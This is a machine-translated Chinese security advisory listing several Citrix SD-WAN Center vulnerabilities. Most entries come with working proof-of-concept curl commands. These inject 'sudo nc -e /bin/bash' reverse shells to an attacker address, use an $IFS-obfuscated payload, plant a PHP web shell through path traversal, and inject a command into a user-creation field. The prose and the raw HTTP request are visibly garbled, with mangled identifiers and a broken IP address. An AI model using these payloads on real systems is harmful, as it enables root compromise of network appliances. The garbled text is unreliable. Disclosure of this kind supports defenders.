多重漏洞发现于CitrixSD-WAN中心注释 : 自'www-data'用户被授予'sdo'特权以来,所有漏洞都可用以获取根访问权
CVE-2019-12985: /Collector/diagnostics/ping Unauthenticated Command Injection
诊断器操作极易由远程非认证攻击者指令注入具体地说,ping函数不完全验证或净化用于构建shell命令的HTTP请求参数值攻击者通过收集器控制器路由传输并提供编译值以表示ibadress、pingCount或packetSize
概念证明
ncip=192.168.1.191 ncport=4444 target=192.168.1.198 curl --insecure -d 'ipAddress=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60' https://$target/Collector/diagnostics/ping
CVE-2019-12986: /Collector/diagnostics/trace_route Unauthenticated Command Injection
trace_route诊断器操作易由远程非认证攻击者指令注入具体地说,try_route函数没有充分验证或净化用于构建shell命令的HTTP请求参数值攻击者通过收集器控制器路由传输并提供编译值
概念证明
ncip=192.168.1.191 ncport=4444 target=192.168.1.198 curl --insecure -d 'ipAddress=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60' https://$target/Collector/diagnostics/trace_route
CVE-2019-12987: /Collector/storagemgmt/apply Unauthenticated Command Injection
存储Mgmt操作易指令由远程非认证攻击者注入具体地说,调用StoragePerl函数不完全验证或净化用于构建shell命令的HTTP请求参数值攻击者通过收集器控制器路由传输并提供数组值并编译数值用于action、host、path或stype
概念证明
ncip=192.168.1.191 ncport=4444 target=192.168.1.198 curl --insecure 'https://'$target'/Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype'
CVE-2019-12988: /Collector/nms/addModifyZTDProxy Unauthenticated Command Injection
addmofifyZTDProxy操作具体地说,addifyZTDProxy函数不完全验证或净化用于构建外壳命令的HTTP请求参数值攻击者通过收集器控制器路由传输并提供ztd-password人工值可触发易失性
概念证明
ncip=192.168.1.191 ncport=4444 target=192.168.1.198 curl --insecure 'https://'$target'/Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(sudo$IFS/bin/nc$IFS-nv$IFS$(/bin/echo$IFS-e$IFS\x3'$ncip')$IFS$(/bin/echo$IFS-e$IFS\x3'$ncport')$IFS-e$IFS/bin/bash)'
CVE-2019-12990: /Collector/appliancesettings/applianceSettingsFileTransfer Unauthenticated Directory Traversal File Write
应用程序设置控制器中应用设置易转换动作很容易由远程非认证攻击者遍历目录具体地说,应用程序设置fileTransfer函数不完全验证或净化HTTP请求参数值,而该参数值用于构建文件系统路径攻击者通过收集器控制器路由传输并提供编译值以表示文件名、文件数据、工作空间i可使用此漏洞写文件到可写由'www-data'用户下载的位置攻击者可写出手写PHP文件/home/taliuser/www/app/webroot/files/执行任意PHP代码
概念证明
ncip=192.168.1.191 ncport=4444 target=192.168.1.198 curl --insecure -d 'filename=../../../../../../home/talariuser/www/app/webroot/files/shell.php&filedata=
' https://$target/Collector/appliancesettings/applianceSettingsFileTransfer curl --insecure https://$target/talari/app/files/shell.php
CVE-2019-12992:/用户/创建验证命令注入
用户管理员中的创建动作很容易受远程验证攻击者指令注入具体地说,创建函数无法充分验证或净化用于构建shell命令的HTTP请求参数值攻击者通过提供虚构值注释:当$级别比较整数值时(使用 ym),它转换为0正因如此验证传递类型校验对这里有帮助
概念证明
POST/用户/创建HTTP/1.1主机:192168.1198用户代理机:Mozilla/5.0英特尔 MacOSX10.14Gecko20100101Firefox/65.0接受:应用/json文本/javascriptq=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.198/Users?rdx=true Content-Type: application/x-www-form-urlencoded!字符集=UTF-8 X请求带式: XMLHtp请求内容链149连接Cookie:urhash构件=VWCSession=15jjk7584jmn9v5na2q6gspnc3 username=scooby&level=`sudo+touch+/var/tmp/vuln_6`&password=password&confirm_password=password&secAuth=false&csrf_token=9b97e4423f0f0bdf18e089b2de3c8e78
root-WANCenter:/opt/citrix/LS#s-l/var/tmp共0-r-r-r-